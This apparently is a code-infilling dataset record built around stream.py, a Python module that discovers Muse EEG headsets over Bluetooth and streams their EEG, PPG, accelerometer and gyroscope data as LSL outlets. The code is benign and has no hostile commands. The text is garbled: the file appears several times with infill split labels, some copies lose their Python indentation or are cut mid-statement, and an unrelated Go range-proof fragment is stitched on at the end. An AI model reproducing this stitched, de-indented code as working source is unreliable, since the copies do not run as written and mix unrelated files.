from .constants import MUSE_SCAN_TIMEOUT, AUTO_DISCONNECT_DELAY, \
MUSE_NB_EEG_CHANNELS, MUSE_SAMPLING_EEG_RATE, LSL_EEG_CHUNK, \
MUSE_NB_PPG_CHANNELS, MUSE_SAMPLING_PPG_RATE, LSL_PPG_CHUNK, \
MUSE_NB_ACC_CHANNELS, MUSE_SAMPLING_ACC_RATE, LSL_ACC_CHUNK, \
MUSE_NB_GYRO_CHANNELS, MUSE_SAMPLING_GYRO_RATE, LSL_GYRO_CHUNK
def _print_muse_list(muses):
    # Report each discovered device, or a "none found" message for an empty list.
    for m in muses:
        print(f'Found device {m["name"]}, MAC Address {m["address"]}')
    if not muses:
        print('No Muses found.')
# Returns a list of available Muse devices.
def list_muses(backend='auto', interface=None):
    """Scan for Muse headsets; returns {'name','address'} dicts (None for bluemuse)."""
    # bluetoothctl is preferred over pygatt's deprecated hcitool-based scan.
    if backend == 'auto' and which('bluetoothctl') is not None:
        print("Backend was 'auto' and bluetoothctl was found, using to list muses...")
        return _list_muses_bluetoothctl(MUSE_SCAN_TIMEOUT)
    backend = helper.resolve_backend(backend)
    if backend == 'gatt':
        interface = interface or 'hci0'
        adapter = pygatt.GATTToolBackend(interface)
    elif backend == 'bluemuse':
        print('Starting BlueMuse, see BlueMuse window for interactive list of devices.')
        subprocess.call('start bluemuse:', shell=True)
        return
    elif backend == 'bleak':
        adapter = backends.BleakBackend()
    elif backend == 'bgapi':
        adapter = pygatt.BGAPIBackend(serial_port=interface)
    # NOTE(review): an unrecognized backend leaves 'adapter' unbound (NameError below).
    try:
        adapter.start()
        print('Searching for Muses, this may take up to 10 seconds...')
        devices = adapter.scan(timeout=MUSE_SCAN_TIMEOUT)
        adapter.stop()
    except pygatt.exceptions.BLEError as e:
        if backend == 'gatt':
            print('pygatt failed to scan for BLE devices. Trying with '
                  'bluetoothctl.')
            return _list_muses_bluetoothctl(MUSE_SCAN_TIMEOUT)
        else:
            raise e
    muses = [d for d in devices if d['name'] and 'Muse' in d['name']]
    _print_muse_list(muses)
    return muses
def _list_muses_bluetoothctl(timeout, verbose=False):
    """Identify Muse BLE devices using bluetoothctl.
    When using backend='gatt' on Linux, pygatt relies on the command line tool
    `hcitool` to scan for BLE devices. `hcitool` is however deprecated, and
    seems to fail on Bluetooth 5 devices. This function roughly replicates the
    functionality of `pygatt.backends.gatttool.gatttool.GATTToolBackend.scan()`
    using the more modern `bluetoothctl` tool.
    Deprecation of hcitool: https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=b1eb2c4cd057624312e0412f6c4be000f7fc3617
    """
    # FIX: the function name was elided in the source dump ("def | (timeout ...");
    # restored as _list_muses_bluetoothctl to match the call sites in list_muses().
    try:
        import pexpect
    except (ImportError, ModuleNotFoundError):
        msg = ('pexpect is currently required to use bluetoothctl from within '
               'a jupter notebook environment.')
        raise ModuleNotFoundError(msg)
    # Run scan using pexpect as subprocess.run returns immediately in jupyter
    # notebooks
    print('Searching for Muses, this may take up to 10 seconds...')
    scan = pexpect.spawn('bluetoothctl scan on')
    try:
        # Sentinel never matches: let the scan run until TIMEOUT fires.
        scan.expect('foooooo', timeout=timeout)
    except pexpect.EOF:
        before_eof = scan.before.decode('utf-8', 'replace')
        msg = f'Unexpected error when scanning: {before_eof}'
        raise ValueError(msg)
    except pexpect.TIMEOUT:
        if verbose:
            print(scan.before.decode('utf-8', 'replace').split('\r\n'))
    # List devices using bluetoothctl
    list_devices_cmd = ['bluetoothctl', 'devices']
    devices = subprocess.run(
        list_devices_cmd, stdout=subprocess.PIPE).stdout.decode(
        'utf-8').split('\n')
    muses = [{
        'name': re.findall('Muse.*', string=d)[0],
        'address': re.findall(r'..:..:..:..:..:..', string=d)[0]
    } for d in devices if 'Muse' in d]
    _print_muse_list(muses)
    return muses
# Returns the address of the Muse with the name provided, otherwise returns address of first available Muse.
def find_muse(name=None, backend='auto'):
    """Return the Muse dict matching `name`, else the first discovered one.

    Returns None implicitly when no match / no devices are found.
    NOTE(review): list_muses() returns None for the 'bluemuse' backend, which
    would make the iteration below raise TypeError -- confirm callers never
    pass backend='bluemuse' here.
    """
    muses = list_muses(backend)
    if name:
        for muse in muses:
            if muse['name'] == name:
                return muse
    elif muses:
        return muses[0]
# Begins LSL stream(s) from a Muse with a given address with data sources determined by arguments
def stream(
address,
backend='auto',
interface=None,
name=None,
ppg_enabled=False,
acc_enabled=False,
gyro_enabled=False,
eeg_disabled=False,
preset=None,
disable_light=False,
timeout=AUTO_DISCONNECT_DELAY,
):
# If no data types are enabled, we warn the user and return immediately.
if eeg_disabled and not ppg_enabled and not acc_enabled and not gyro_enabled:
print('Stream initiation failed: At least one data source must be enabled.')
return
# For any backend except bluemuse, we will start LSL streams hooked up to the muse callbacks.
if backend != 'bluemuse':
if not address:
found_muse = find_muse(name, backend)
if not found_muse:
return
else:
address = found_muse['address']
name = found_muse['name']
if not eeg_disabled:
eeg_info = StreamInfo('Muse', 'EEG', MUSE_NB_EEG_CHANNELS, MUSE_SAMPLING_EEG_RATE, 'float32',
'Muse%s' % address)
eeg_info.desc().append_child_value("manufacturer", "Muse")
eeg_channels = eeg_info.desc().append_child("channels")
for c in ['TP9', 'AF7', 'AF8', 'TP10', 'Right AUX']:
eeg_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "microvolts") \
.append_child_value("type", "EEG")
eeg_outlet = StreamOutlet(eeg_info, LSL_EEG_CHUNK)
if ppg_enabled:
ppg_info = StreamInfo('Muse', 'PPG', MUSE_NB_PPG_CHANNELS, MUSE_SAMPLING_PPG_RATE,
'float32', 'Muse%s' % address)
ppg_info.desc().append_child_value("manufacturer", "Muse")
ppg_channels = ppg_info.desc().append_child("channels")
for c in ['PPG1', 'PPG2', 'PPG3']:
ppg_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "mmHg") \
.append_child_value("type", "PPG")
ppg_outlet = StreamOutlet(ppg_info, LSL_PPG_CHUNK)
if acc_enabled:
acc_info = StreamInfo('Muse', 'ACC', MUSE_NB_ACC_CHANNELS, MUSE_SAMPLING_ACC_RATE,
'float32', 'Muse%s' % address)
acc_info.desc().append_child_value("manufacturer", "Muse")
acc_channels = acc_info.desc().append_child("channels")
for c in ['X', 'Y', 'Z']:
acc_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "g") \
.append_child_value("type", "accelerometer")
acc_outlet = StreamOutlet(acc_info, LSL_ACC_CHUNK)
if gyro_enabled:
gyro_info = StreamInfo('Muse', 'GYRO', MUSE_NB_GYRO_CHANNELS, MUSE_SAMPLING_GYRO_RATE,
'float32', 'Muse%s' % address)
gyro_info.desc().append_child_value("manufacturer", "Muse")
gyro_channels = gyro_info.desc().append_child("channels")
for c in ['X', 'Y', 'Z']:
gyro_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "dps") \
.append_child_value("type", "gyroscope")
gyro_outlet = StreamOutlet(gyro_info, LSL_GYRO_CHUNK)
def push(data, timestamps, outlet):
for ii in range(data.shape[1]):
outlet.push_sample(data[:, ii], timestamps[ii])
push_eeg = partial(push, outlet=eeg_outlet) if not eeg_disabled else None
push_ppg = partial(push, outlet=ppg_outlet) if ppg_enabled else None
push_acc = partial(push, outlet=acc_outlet) if acc_enabled else None
push_gyro = partial(push, outlet=gyro_outlet) if gyro_enabled else None
muse = Muse(address=address, callback_eeg=push_eeg, callback_ppg=push_ppg, callback_acc=push_acc, callback_gyro=push_gyro,
backend=backend, interface=interface, name=name, preset=preset, disable_light=disable_light)
didConnect = muse.connect()
if(didConnect):
print('Connected.')
muse.start()
eeg_string = " EEG" if not eeg_disabled else ""
ppg_string = " PPG" if ppg_enabled else ""
acc_string = " ACC" if acc_enabled else ""
gyro_string = " GYRO" if gyro_enabled else ""
print("Streaming%s%s%s%s..." %
(eeg_string, ppg_string, acc_string, gyro_string))
while time() - muse.last_timestamp < timeout:
try:
backends.sleep(1)
except KeyboardInterrupt:
muse.stop()
muse.disconnect()
break
print('Disconnected.')
# For bluemuse backend, we don't need to create LSL streams directly, since these are handled in BlueMuse itself.
else:
# Toggle all data stream types in BlueMuse.
subprocess.call('start bluemuse://setting?key=eeg_enabled!value={}'.format('false' if eeg_disabled else 'true'), shell=True)
subprocess.call('start bluemuse://setting?key=ppg_enabled!value={}'.format('true' if ppg_enabled else 'false'), shell=True)
subprocess.call('start bluemuse://setting?key=accelerometer_enabled!value={}'.format('true' if acc_enabled else 'false'), shell=True)
subprocess.call('start bluemuse://setting?key=gyroscope_enabled!value={}'.format('true' if gyro_enabled else 'false'), shell=True)
muse = Muse(address=address, callback_eeg=None, callback_ppg=None, callback_acc=None, callback_gyro=None,
backend=backend, interface=interface, name=name)
muse.connect()
if not address and not name:
print('Targeting first device BlueMuse discovers...')
else:
print('Targeting device: '
+ ':'.join(filter(None, [name, address])) + '...')
print('\n*BlueMuse will auto connect and stream when the device is found. \n*You can also use the BlueMuse interface to manage your stream(s).')
muse.start()
| _list_muses_bluetoothctl | identifier_name |
stream.py | import re
import subprocess
from sys import platform
from time import time
from functools import partial
from shutil import which
from pylsl import StreamInfo, StreamOutlet
import pygatt
from . import backends
from . import helper
from .muse import Muse
from .constants import MUSE_SCAN_TIMEOUT, AUTO_DISCONNECT_DELAY, \
MUSE_NB_EEG_CHANNELS, MUSE_SAMPLING_EEG_RATE, LSL_EEG_CHUNK, \
MUSE_NB_PPG_CHANNELS, MUSE_SAMPLING_PPG_RATE, LSL_PPG_CHUNK, \
MUSE_NB_ACC_CHANNELS, MUSE_SAMPLING_ACC_RATE, LSL_ACC_CHUNK, \
MUSE_NB_GYRO_CHANNELS, MUSE_SAMPLING_GYRO_RATE, LSL_GYRO_CHUNK
def _print_muse_list(muses):
for m in muses:
print(f'Found device {m["name"]}, MAC Address {m["address"]}')
if not muses:
print('No Muses found.')
# Returns a list of available Muse devices.
def list_muses(backend='auto', interface=None):
    """Scan for nearby Muse headsets and return them as a list of dicts.

    Each entry has 'name' and 'address' keys. Returns None for the
    'bluemuse' backend, which manages discovery in its own window.
    """
    # Prefer the modern bluetoothctl tool when available: pygatt's gatt
    # backend relies on the deprecated hcitool, which fails on newer adapters.
    if backend == 'auto' and which('bluetoothctl') is not None:
        print("Backend was 'auto' and bluetoothctl was found, using to list muses...")
        return _list_muses_bluetoothctl(MUSE_SCAN_TIMEOUT)
    backend = helper.resolve_backend(backend)
    if backend == 'gatt':
        interface = interface or 'hci0'
        adapter = pygatt.GATTToolBackend(interface)
    elif backend == 'bluemuse':
        # BlueMuse (Windows) shows its own interactive device list; nothing to return.
        print('Starting BlueMuse, see BlueMuse window for interactive list of devices.')
        subprocess.call('start bluemuse:', shell=True)
        return
    elif backend == 'bleak':
        adapter = backends.BleakBackend()
    elif backend == 'bgapi':
        adapter = pygatt.BGAPIBackend(serial_port=interface)
    try:
        adapter.start()
        print('Searching for Muses, this may take up to 10 seconds...')
        devices = adapter.scan(timeout=MUSE_SCAN_TIMEOUT)
        adapter.stop()
    except pygatt.exceptions.BLEError as e:
        # The gatt backend's hcitool scan is flaky; retry with bluetoothctl.
        if backend == 'gatt':
            print('pygatt failed to scan for BLE devices. Trying with '
                  'bluetoothctl.')
            return _list_muses_bluetoothctl(MUSE_SCAN_TIMEOUT)
        else:
            raise e
    # Keep only devices whose advertised name contains 'Muse'.
    muses = [d for d in devices if d['name'] and 'Muse' in d['name']]
    _print_muse_list(muses)
    return muses
def _list_muses_bluetoothctl(timeout, verbose=False):
    """Identify Muse BLE devices using bluetoothctl.

    When using backend='gatt' on Linux, pygatt relies on the command line tool
    `hcitool` to scan for BLE devices. `hcitool` is however deprecated, and
    seems to fail on Bluetooth 5 devices. This function roughly replicates the
    functionality of `pygatt.backends.gatttool.gatttool.GATTToolBackend.scan()`
    using the more modern `bluetoothctl` tool.
    Deprecation of hcitool: https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=b1eb2c4cd057624312e0412f6c4be000f7fc3617
    """
    try:
        import pexpect
    except (ImportError, ModuleNotFoundError):
        msg = ('pexpect is currently required to use bluetoothctl from within '
               'a jupter notebook environment.')
        raise ModuleNotFoundError(msg)
    # Run scan using pexpect as subprocess.run returns immediately in jupyter
    # notebooks
    print('Searching for Muses, this may take up to 10 seconds...')
    scan = pexpect.spawn('bluetoothctl scan on')
    try:
        # Deliberate trick: this pattern never appears in the output, so
        # expect() keeps the scan alive until `timeout` elapses and the
        # TIMEOUT branch below is taken (the normal path).
        scan.expect('foooooo', timeout=timeout)
    except pexpect.EOF:
        before_eof = scan.before.decode('utf-8', 'replace')
        msg = f'Unexpected error when scanning: {before_eof}'
        raise ValueError(msg)
    except pexpect.TIMEOUT:
        if verbose:
            print(scan.before.decode('utf-8', 'replace').split('\r\n'))
    # List devices using bluetoothctl
    list_devices_cmd = ['bluetoothctl', 'devices']
    devices = subprocess.run(
        list_devices_cmd, stdout=subprocess.PIPE).stdout.decode(
            'utf-8').split('\n')
    # Each matching line looks like "Device XX:XX:XX:XX:XX:XX Muse-NAME";
    # pull the trailing name and the MAC address out of it.
    muses = [{
        'name': re.findall('Muse.*', string=d)[0],
        'address': re.findall(r'..:..:..:..:..:..', string=d)[0]
    } for d in devices if 'Muse' in d]
    _print_muse_list(muses)
    return muses
# Returns the address of the Muse with the name provided, otherwise returns address of first available Muse.
def find_muse(name=None, backend='auto'):
    """Return the device dict of the Muse matching `name`, or the first Muse found.

    Returns None when no (matching) device is discovered. `list_muses`
    returns None for the 'bluemuse' backend; treat that as "no devices"
    instead of raising a TypeError while iterating over None.
    """
    muses = list_muses(backend) or []
    if name:
        for muse in muses:
            if muse['name'] == name:
                return muse
    elif muses:
        return muses[0]
# Begins LSL stream(s) from a Muse with a given address with data sources determined by arguments
def stream(
    address,
    backend='auto',
    interface=None,
    name=None,
    ppg_enabled=False,
    acc_enabled=False,
    gyro_enabled=False,
    eeg_disabled=False,
    preset=None,
    disable_light=False,
    timeout=AUTO_DISCONNECT_DELAY,
):
    """Connect to a Muse headset and publish its data as LSL outlets.

    Parameters:
        address: MAC address of the target Muse; when falsy, the first
            (or name-matching) discovered device is used instead.
        backend: BLE backend name ('auto', 'gatt', 'bleak', 'bgapi',
            'bluemuse').
        interface: adapter interface forwarded to the backend.
        name: device name used for discovery when no address is given.
        ppg_enabled, acc_enabled, gyro_enabled: opt-in extra data streams.
        eeg_disabled: suppress the (default-on) EEG stream.
        preset: Muse preset forwarded to the device (non-bluemuse only).
        disable_light: forwarded to Muse to turn off the headband light.
        timeout: seconds without fresh samples before auto-disconnecting.

    For non-bluemuse backends this blocks, pumping data into the LSL
    outlets, until the data stream goes stale (`timeout`) or the user
    interrupts with Ctrl-C.
    """
    # If no data types are enabled, we warn the user and return immediately.
    if eeg_disabled and not ppg_enabled and not acc_enabled and not gyro_enabled:
        print('Stream initiation failed: At least one data source must be enabled.')
        return
    # For any backend except bluemuse, we will start LSL streams hooked up to the muse callbacks.
    if backend != 'bluemuse':
        if not address:
            found_muse = find_muse(name, backend)
            if not found_muse:
                return
            else:
                address = found_muse['address']
                name = found_muse['name']
        # One StreamInfo/StreamOutlet pair per enabled data source, with
        # channel metadata (label/unit/type) attached for LSL consumers.
        if not eeg_disabled:
            eeg_info = StreamInfo('Muse', 'EEG', MUSE_NB_EEG_CHANNELS, MUSE_SAMPLING_EEG_RATE, 'float32',
                                  'Muse%s' % address)
            eeg_info.desc().append_child_value("manufacturer", "Muse")
            eeg_channels = eeg_info.desc().append_child("channels")
            for c in ['TP9', 'AF7', 'AF8', 'TP10', 'Right AUX']:
                eeg_channels.append_child("channel") \
                    .append_child_value("label", c) \
                    .append_child_value("unit", "microvolts") \
                    .append_child_value("type", "EEG")
            eeg_outlet = StreamOutlet(eeg_info, LSL_EEG_CHUNK)
        if ppg_enabled:
            ppg_info = StreamInfo('Muse', 'PPG', MUSE_NB_PPG_CHANNELS, MUSE_SAMPLING_PPG_RATE,
                                  'float32', 'Muse%s' % address)
            ppg_info.desc().append_child_value("manufacturer", "Muse")
            ppg_channels = ppg_info.desc().append_child("channels")
            for c in ['PPG1', 'PPG2', 'PPG3']:
                ppg_channels.append_child("channel") \
                    .append_child_value("label", c) \
                    .append_child_value("unit", "mmHg") \
                    .append_child_value("type", "PPG")
            ppg_outlet = StreamOutlet(ppg_info, LSL_PPG_CHUNK)
        if acc_enabled:
            acc_info = StreamInfo('Muse', 'ACC', MUSE_NB_ACC_CHANNELS, MUSE_SAMPLING_ACC_RATE,
                                  'float32', 'Muse%s' % address)
            acc_info.desc().append_child_value("manufacturer", "Muse")
            acc_channels = acc_info.desc().append_child("channels")
            for c in ['X', 'Y', 'Z']:
                acc_channels.append_child("channel") \
                    .append_child_value("label", c) \
                    .append_child_value("unit", "g") \
                    .append_child_value("type", "accelerometer")
            acc_outlet = StreamOutlet(acc_info, LSL_ACC_CHUNK)
        if gyro_enabled:
            gyro_info = StreamInfo('Muse', 'GYRO', MUSE_NB_GYRO_CHANNELS, MUSE_SAMPLING_GYRO_RATE,
                                   'float32', 'Muse%s' % address)
            gyro_info.desc().append_child_value("manufacturer", "Muse")
            gyro_channels = gyro_info.desc().append_child("channels")
            for c in ['X', 'Y', 'Z']:
                gyro_channels.append_child("channel") \
                    .append_child_value("label", c) \
                    .append_child_value("unit", "dps") \
                    .append_child_value("type", "gyroscope")
            gyro_outlet = StreamOutlet(gyro_info, LSL_GYRO_CHUNK)

        # Callback shared by all sources: data is (channels, samples),
        # pushed to the outlet one sample column at a time.
        def push(data, timestamps, outlet):
            for ii in range(data.shape[1]):
                outlet.push_sample(data[:, ii], timestamps[ii])
        push_eeg = partial(push, outlet=eeg_outlet) if not eeg_disabled else None
        push_ppg = partial(push, outlet=ppg_outlet) if ppg_enabled else None
        push_acc = partial(push, outlet=acc_outlet) if acc_enabled else None
        push_gyro = partial(push, outlet=gyro_outlet) if gyro_enabled else None
        muse = Muse(address=address, callback_eeg=push_eeg, callback_ppg=push_ppg, callback_acc=push_acc, callback_gyro=push_gyro,
                    backend=backend, interface=interface, name=name, preset=preset, disable_light=disable_light)
        didConnect = muse.connect()
        if(didConnect):
            print('Connected.')
            muse.start()
            eeg_string = " EEG" if not eeg_disabled else ""
            ppg_string = " PPG" if ppg_enabled else ""
            acc_string = " ACC" if acc_enabled else ""
            gyro_string = " GYRO" if gyro_enabled else ""
            print("Streaming%s%s%s%s..." %
                  (eeg_string, ppg_string, acc_string, gyro_string))
            # Keep streaming until samples stop arriving for `timeout`
            # seconds, or the user hits Ctrl-C.
            while time() - muse.last_timestamp < timeout:
                try:
                    backends.sleep(1)
                except KeyboardInterrupt:
                    muse.stop()
                    muse.disconnect()
                    break
            print('Disconnected.')
    # For bluemuse backend, we don't need to create LSL streams directly, since these are handled in BlueMuse itself.
    else:
        # Toggle all data stream types in BlueMuse.
        subprocess.call('start bluemuse://setting?key=eeg_enabled!value={}'.format('false' if eeg_disabled else 'true'), shell=True)
        subprocess.call('start bluemuse://setting?key=ppg_enabled!value={}'.format('true' if ppg_enabled else 'false'), shell=True)
        subprocess.call('start bluemuse://setting?key=accelerometer_enabled!value={}'.format('true' if acc_enabled else 'false'), shell=True)
        subprocess.call('start bluemuse://setting?key=gyroscope_enabled!value={}'.format('true' if gyro_enabled else 'false'), shell=True)
        muse = Muse(address=address, callback_eeg=None, callback_ppg=None, callback_acc=None, callback_gyro=None,
                    backend=backend, interface=interface, name=name)
        muse.connect()
        if not address and not name:
            print('Targeting first device BlueMuse discovers...')
        else:
            print('Targeting device: '
                  + ':'.join(filter(None, [name, address])) + '...')
        print('\n*BlueMuse will auto connect and stream when the device is found. \n*You can also use the BlueMuse interface to manage your stream(s).')
        muse.start()
stream.py | import re
import subprocess
from sys import platform
from time import time
from functools import partial
from shutil import which
from pylsl import StreamInfo, StreamOutlet
import pygatt
from . import backends
from . import helper
from .muse import Muse
from .constants import MUSE_SCAN_TIMEOUT, AUTO_DISCONNECT_DELAY, \
MUSE_NB_EEG_CHANNELS, MUSE_SAMPLING_EEG_RATE, LSL_EEG_CHUNK, \
MUSE_NB_PPG_CHANNELS, MUSE_SAMPLING_PPG_RATE, LSL_PPG_CHUNK, \
MUSE_NB_ACC_CHANNELS, MUSE_SAMPLING_ACC_RATE, LSL_ACC_CHUNK, \
MUSE_NB_GYRO_CHANNELS, MUSE_SAMPLING_GYRO_RATE, LSL_GYRO_CHUNK
def _print_muse_list(muses):
for m in muses:
print(f'Found device {m["name"]}, MAC Address {m["address"]}')
if not muses:
print('No Muses found.')
# Returns a list of available Muse devices.
def list_muses(backend='auto', interface=None):
if backend == 'auto' and which('bluetoothctl') is not None:
print("Backend was 'auto' and bluetoothctl was found, using to list muses...")
return _list_muses_bluetoothctl(MUSE_SCAN_TIMEOUT)
backend = helper.resolve_backend(backend)
if backend == 'gatt':
interface = interface or 'hci0'
adapter = pygatt.GATTToolBackend(interface)
elif backend == 'bluemuse':
print('Starting BlueMuse, see BlueMuse window for interactive list of devices.')
subprocess.call('start bluemuse:', shell=True)
return
elif backend == 'bleak':
adapter = backends.BleakBackend()
elif backend == 'bgapi':
adapter = pygatt.BGAPIBackend(serial_port=interface)
try:
adapter.start()
print('Searching for Muses, this may take up to 10 seconds...')
devices = adapter.scan(timeout=MUSE_SCAN_TIMEOUT)
adapter.stop()
except pygatt.exceptions.BLEError as e:
if backend == 'gatt':
print('pygatt failed to scan for BLE devices. Trying with '
'bluetoothctl.')
return _list_muses_bluetoothctl(MUSE_SCAN_TIMEOUT)
else:
raise e
muses = [d for d in devices if d['name'] and 'Muse' in d['name']]
_print_muse_list(muses)
return muses
def _list_muses_bluetoothctl(timeout, verbose=False):
"""Identify Muse BLE devices using bluetoothctl.
When using backend='gatt' on Linux, pygatt relies on the command line tool
`hcitool` to scan for BLE devices. `hcitool` is however deprecated, and
seems to fail on Bluetooth 5 devices. This function roughly replicates the
functionality of `pygatt.backends.gatttool.gatttool.GATTToolBackend.scan()`
using the more modern `bluetoothctl` tool.
Deprecation of hcitool: https://git.kernel.org/pub/scm/bluetooth/bluez.git/commit/?id=b1eb2c4cd057624312e0412f6c4be000f7fc3617
"""
try:
import pexpect
except (ImportError, ModuleNotFoundError):
msg = ('pexpect is currently required to use bluetoothctl from within '
'a jupter notebook environment.')
raise ModuleNotFoundError(msg)
# Run scan using pexpect as subprocess.run returns immediately in jupyter
# notebooks
print('Searching for Muses, this may take up to 10 seconds...')
scan = pexpect.spawn('bluetoothctl scan on')
try:
scan.expect('foooooo', timeout=timeout)
except pexpect.EOF:
before_eof = scan.before.decode('utf-8', 'replace')
msg = f'Unexpected error when scanning: {before_eof}'
raise ValueError(msg)
except pexpect.TIMEOUT:
if verbose:
print(scan.before.decode('utf-8', 'replace').split('\r\n'))
# List devices using bluetoothctl | muses = [{
'name': re.findall('Muse.*', string=d)[0],
'address': re.findall(r'..:..:..:..:..:..', string=d)[0]
} for d in devices if 'Muse' in d]
_print_muse_list(muses)
return muses
# Returns the address of the Muse with the name provided, otherwise returns address of first available Muse.
def find_muse(name=None, backend='auto'):
muses = list_muses(backend)
if name:
for muse in muses:
if muse['name'] == name:
return muse
elif muses:
return muses[0]
# Begins LSL stream(s) from a Muse with a given address with data sources determined by arguments
def stream(
address,
backend='auto',
interface=None,
name=None,
ppg_enabled=False,
acc_enabled=False,
gyro_enabled=False,
eeg_disabled=False,
preset=None,
disable_light=False,
timeout=AUTO_DISCONNECT_DELAY,
):
# If no data types are enabled, we warn the user and return immediately.
if eeg_disabled and not ppg_enabled and not acc_enabled and not gyro_enabled:
print('Stream initiation failed: At least one data source must be enabled.')
return
# For any backend except bluemuse, we will start LSL streams hooked up to the muse callbacks.
if backend != 'bluemuse':
if not address:
found_muse = find_muse(name, backend)
if not found_muse:
return
else:
address = found_muse['address']
name = found_muse['name']
if not eeg_disabled:
eeg_info = StreamInfo('Muse', 'EEG', MUSE_NB_EEG_CHANNELS, MUSE_SAMPLING_EEG_RATE, 'float32',
'Muse%s' % address)
eeg_info.desc().append_child_value("manufacturer", "Muse")
eeg_channels = eeg_info.desc().append_child("channels")
for c in ['TP9', 'AF7', 'AF8', 'TP10', 'Right AUX']:
eeg_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "microvolts") \
.append_child_value("type", "EEG")
eeg_outlet = StreamOutlet(eeg_info, LSL_EEG_CHUNK)
if ppg_enabled:
ppg_info = StreamInfo('Muse', 'PPG', MUSE_NB_PPG_CHANNELS, MUSE_SAMPLING_PPG_RATE,
'float32', 'Muse%s' % address)
ppg_info.desc().append_child_value("manufacturer", "Muse")
ppg_channels = ppg_info.desc().append_child("channels")
for c in ['PPG1', 'PPG2', 'PPG3']:
ppg_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "mmHg") \
.append_child_value("type", "PPG")
ppg_outlet = StreamOutlet(ppg_info, LSL_PPG_CHUNK)
if acc_enabled:
acc_info = StreamInfo('Muse', 'ACC', MUSE_NB_ACC_CHANNELS, MUSE_SAMPLING_ACC_RATE,
'float32', 'Muse%s' % address)
acc_info.desc().append_child_value("manufacturer", "Muse")
acc_channels = acc_info.desc().append_child("channels")
for c in ['X', 'Y', 'Z']:
acc_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "g") \
.append_child_value("type", "accelerometer")
acc_outlet = StreamOutlet(acc_info, LSL_ACC_CHUNK)
if gyro_enabled:
gyro_info = StreamInfo('Muse', 'GYRO', MUSE_NB_GYRO_CHANNELS, MUSE_SAMPLING_GYRO_RATE,
'float32', 'Muse%s' % address)
gyro_info.desc().append_child_value("manufacturer", "Muse")
gyro_channels = gyro_info.desc().append_child("channels")
for c in ['X', 'Y', 'Z']:
gyro_channels.append_child("channel") \
.append_child_value("label", c) \
.append_child_value("unit", "dps") \
.append_child_value("type", "gyroscope")
gyro_outlet = StreamOutlet(gyro_info, LSL_GYRO_CHUNK)
def push(data, timestamps, outlet):
for ii in range(data.shape[1]):
outlet.push_sample(data[:, ii], timestamps[ii])
push_eeg = partial(push, outlet=eeg_outlet) if not eeg_disabled else None
push_ppg = partial(push, outlet=ppg_outlet) if ppg_enabled else None
push_acc = partial(push, outlet=acc_outlet) if acc_enabled else None
push_gyro = partial(push, outlet=gyro_outlet) if gyro_enabled else None
muse = Muse(address=address, callback_eeg=push_eeg, callback_ppg=push_ppg, callback_acc=push_acc, callback_gyro=push_gyro,
backend=backend, interface=interface, name=name, preset=preset, disable_light=disable_light)
didConnect = muse.connect()
if(didConnect):
print('Connected.')
muse.start()
eeg_string = " EEG" if not eeg_disabled else ""
ppg_string = " PPG" if ppg_enabled else ""
acc_string = " ACC" if acc_enabled else ""
gyro_string = " GYRO" if gyro_enabled else ""
print("Streaming%s%s%s%s..." %
(eeg_string, ppg_string, acc_string, gyro_string))
while time() - muse.last_timestamp < timeout:
try:
backends.sleep(1)
except KeyboardInterrupt:
muse.stop()
muse.disconnect()
break
print('Disconnected.')
# For bluemuse backend, we don't need to create LSL streams directly, since these are handled in BlueMuse itself.
else:
# Toggle all data stream types in BlueMuse.
subprocess.call('start bluemuse://setting?key=eeg_enabled!value={}'.format('false' if eeg_disabled else 'true'), shell=True)
subprocess.call('start bluemuse://setting?key=ppg_enabled!value={}'.format('true' if ppg_enabled else 'false'), shell=True)
subprocess.call('start bluemuse://setting?key=accelerometer_enabled!value={}'.format('true' if acc_enabled else 'false'), shell=True)
subprocess.call('start bluemuse://setting?key=gyroscope_enabled!value={}'.format('true' if gyro_enabled else 'false'), shell=True)
muse = Muse(address=address, callback_eeg=None, callback_ppg=None, callback_acc=None, callback_gyro=None,
backend=backend, interface=interface, name=name)
muse.connect()
if not address and not name:
print('Targeting first device BlueMuse discovers...')
else:
print('Targeting device: '
+ ':'.join(filter(None, [name, address])) + '...')
print('\n*BlueMuse will auto connect and stream when the device is found. \n*You can also use the BlueMuse interface to manage your stream(s).')
muse.start() | list_devices_cmd = ['bluetoothctl', 'devices']
devices = subprocess.run(
list_devices_cmd, stdout=subprocess.PIPE).stdout.decode(
'utf-8').split('\n') | random_line_split |
mpc_range_proof.go | package mbp
import (
"crypto/rand"
"crypto/sha256"
"fmt"
"math/big"
)
// MPCRangeProof is a struct of secure multi-party computation range proof
type MPCRangeProof struct {
	Comms []ECPoint    // per-party Pedersen commitments to the secret values
	A     ECPoint      // aggregated commitment to the bit vectors aL, aR
	S     ECPoint      // aggregated commitment to the blinding vectors sL, sR
	T1    ECPoint      // commitment to t1, the linear coefficient of t(X)
	T2    ECPoint      // commitment to t2, the quadratic coefficient of t(X)
	Tau   *big.Int     // aggregated blinding factor for Th
	Th    *big.Int     // t-hat = <l(x), r(x)> over all parties
	Mu    *big.Int     // aggregated blinding folding alpha + rho*x
	IPP   InnerProdArg // inner-product argument compressing l(x) and r(x)
	// challenges (derived via Fiat-Shamir in Fait_y_z / Fait_x)
	Cy *big.Int
	Cz *big.Int
	Cx *big.Int
}

// PrivateParams is the private params of Prover
type PrivateParams struct {
	Id    int        // party index
	V     *big.Int   // secret value being range-proved
	AL    []*big.Int // bit decomposition of V
	AR    []*big.Int // AL - 1^n
	SL    []*big.Int // random blinding vector paired with AL
	SR    []*big.Int // random blinding vector paired with AR
	Gamma *big.Int   // blinding of the value commitment
	Alpha *big.Int   // blinding of commitment A
	Rho   *big.Int   // blinding of commitment S
	Tt0   *big.Int   // t0 coefficient of t(X)
	Tt1   *big.Int   // t1 coefficient of t(X)
	Tt2   *big.Int   // t2 coefficient of t(X)
	Tau1  *big.Int   // blinding of T1
	Tau2  *big.Int   // blinding of T2
}

// InitParams holds the public sizing parameters of the protocol.
type InitParams struct {
	//EC CryptoParams
	N int
	M int
}

// ASCommitment is a party's first-round message (value commitment plus A and S).
type ASCommitment struct {
